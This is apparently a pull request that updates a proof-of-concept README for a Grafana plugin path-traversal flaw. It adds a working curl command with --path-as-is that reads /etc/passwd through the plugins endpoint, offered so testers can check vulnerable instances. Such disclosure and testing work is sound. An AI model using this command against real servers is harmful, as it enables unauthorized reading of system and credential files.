### PR TITLE
Add instructions for POC with curl

### DIFF
--- a/README.md
+++ b/README.md
@@ -39,7 +39,12 @@ GET -  http://localhost:3000/public/plugins/alertlist/../../../../../../../../et
 
 Offending Code: https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284
 
-**Note: This does not work in the browser or in curl (not sure why)**
+**Note: This does not work in the browser (which automatically collapse the `../` in the path)**
+
+It can be tested with curl by using the `--path-as-is` argument:
+```
+curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
+```
 
 ## Attack Vectors
 


### PR DESCRIPTION
I figured out why this couldn't be tested using a browser or curl: they both automatically collapse instances of `../` in the path.

But there is an easy way to test this with curl using the `--path-as-is` argument. I updated the note with this example so it's easy to check whether an instance is vulnerable without having to use an extra tool